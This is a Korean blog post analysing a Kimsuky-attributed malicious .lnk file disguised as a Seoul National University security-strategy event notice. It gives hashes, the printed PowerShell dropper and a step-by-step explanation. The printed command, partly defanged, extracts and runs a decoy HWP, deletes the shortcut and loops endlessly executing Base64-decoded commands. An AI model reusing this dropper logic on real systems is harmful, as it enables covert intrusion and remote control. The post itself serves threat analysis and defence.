오늘도 존경하지 않고 한국 안보를 위협하는 존재인 북한 해킹 단체 김수키(Kimsuky)에서 만든 글로벌 복합 위기 한국의 안보전략이라는 악성코드에 대해 알아보겠습니다.
해당 악성코드는 서울대 국제문제연구소 주최로 열리는지 모르겠지만, 아무튼 해당 주최에서 만들어진 것이 만들어진 문서인지 모르겠지만 저는 있는 그대로 적어 보겠습니다.
해쉬
파일명:글로벌 복합 위기 한국의 안보전략.lnk
사이즈:56,397 Bytes
MD5:dea5ea1f43819570b82c95ff2cfef3b4
SHA-1:cb7fc4243f70956ea8c2ba961d4a4b3a14624a6c
SHA-256:26bf7746400d81c4fa11b29a2abac4cf46fc609e3bf3273f632cb496ff0c03aa
악성코드 포함된 Powershell 코드
StringData
{
namestring: not present
relativepath: not present
workingdir:
commandlinearguments: /c start /(m)in powershell -windowstyle hidden $lk=ls -Pat
h '.\' ^| Where {$_.length -eq (5)6397};if($lk -eq $null) {$lk=ls -Path $env:tem
p -depth 2 ^| Where {$_.length -eq 56397}};$n=$lk.name.Replace('.lnk',(').hwp');$lk=$lk.FullName;$file = [System.IO.File]::ReadAllBytes($lk);$file1=[byte[]]$file[5709..(5709(+)50688-1)];$fPath=$lk.Repl(a)ce('.lnk','.hwp');[System.IO.File]::WriteAllBytes($fPath,$file1);^&$fPath;ri $lk -force;do{$dns=[System.Text.Encoding]::UTF8.GetS(t)ring([System.Convert]::FromBase64String('???e9b9(2)9ad8d6c4969a87dfdb9b9a???=='));Invoke-expression $dns}while(1);
iconlocation: hxxps://raw(.)githubusercontent(.)com/correctpo/se/refs/heads/main/h(.)ico
}악성코드 분석
1.PowerShell을 최소화 숨김 상태로 실행
현재 디렉터리에서 정확히 56,397바이트인 파일을 찾음
없을 때 %TEMP%에서 대체 검색
해당 파일의 원시 바이트를 메모리로 읽음
오프셋 5709부터 길이 50,688바이트만큼 잘라냄.
해당 잘라낸 바이트를. hwp로 저장하고 실행함
원본 파일을 삭제해 흔적을 지움.
Base64 문자열을 디코드해서 Invoke-Expression 으로 실행하는 코드를 무한 반복하며 추가 다운로드 및 명령 실행, C2 연결 등을 수행
쉽게 이야기하면 다음가 같음
1. 현재 폴더에서 크기 56397바이트인 파일을 찾음 (없으면 `%TEMP% 폴더에서 깊이 2까지 검색)
2. 해당 파일(대상은 .lnk) 전체바이트를 읽음
3. 바이트 배열의 오프셋 5709 부터 길이 50688 바이트를 잘라 새로운 파일로 저장
새 확장자는 .hwp로 변경
4.$fPath (추출한 .hwp)을 & 연산자로 실행 바로 실행
5.원본 .lnk를 강제 삭제
6. Base64로 인코딩된 문자열을 디코드해 UTF8 문자열로 표시 그리고 Invoke-Expression으로 실행 이렇게 무한 루프(while 1)로 계속 반복
그리고 나서 글로벌 복합 위기 한국의 안보전략이라는 HWP 실행
HWP 내용
“글로벌 복합 위기, 한국의 안보전략”
1.일정
일시:10월 8일 수요일, 14:00~17:30
장소:더플라자호텔 오크홀
형식:온라인․오프라인 동시 진행
주최:서울대 국제문제연구소
이며 일단 주최자가 서울대학교 정치외교학부 외교학전공 교수 서울대 러시아지역연구, 러시아정치 및 외교정책인 것을 보면 일단은 교수는 맞는 것 같은데…. 정확하게 해당 문서가 진짜인지 모르니까? 확인이 필요하지 않을까 생각이 됩니다. 이상 이렇게 오늘도 북한 김수키(Kimsuky)에서 만든 악성코드인 글로벌 복합 위기 한국의 안보전략.lnk(2025.9.28)에 대해 알아보았습니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| Microsoft 제로데이 공격 이후 Microsoft Edge에서 IE 모드 접근 제한 (0) | 2025.10.15 |
|---|---|
| 북한 김수키(Kimsuky)에서 만든 악성코드-미신고 자금출처 해명 자료 제출 안내(부가치세법 시행 규칙) (0) | 2025.10.14 |
| 파키스탄 정부 노리는 것으로 추정되는 악성코드-China-Pakistan-Free-Trade-Agreement-Phase-2.chm(2025.10.6) (0) | 2025.10.11 |
| 김수키(Kimsuky) 에서 만든 악성코드-osinfo.dll(2025.10.4) (0) | 2025.10.08 |
| Notepad++ DLL 하이재킹 취약점으로 인해 공격자가 악성 코드 할수 있는 취약점-CVE-2025-56383 (0) | 2025.10.01 |
| 북한 Lazarus(라자루스) 가상화폐(암호화폐)탈취를 위해 만들어진 악성코드-config(.)py(2025.8.7) (0) | 2025.09.29 |
| 파이썬 개발자 가짜 PyPI 사이트 피싱 사기 주의 (0) | 2025.09.25 |
| 김수키(Kimsuky) 추정 국방대학교 안보정책학부 교수를 노린 주한 중화인민공화국 대사관 무관부 사칭 악성코드 (0) | 2025.09.24 |
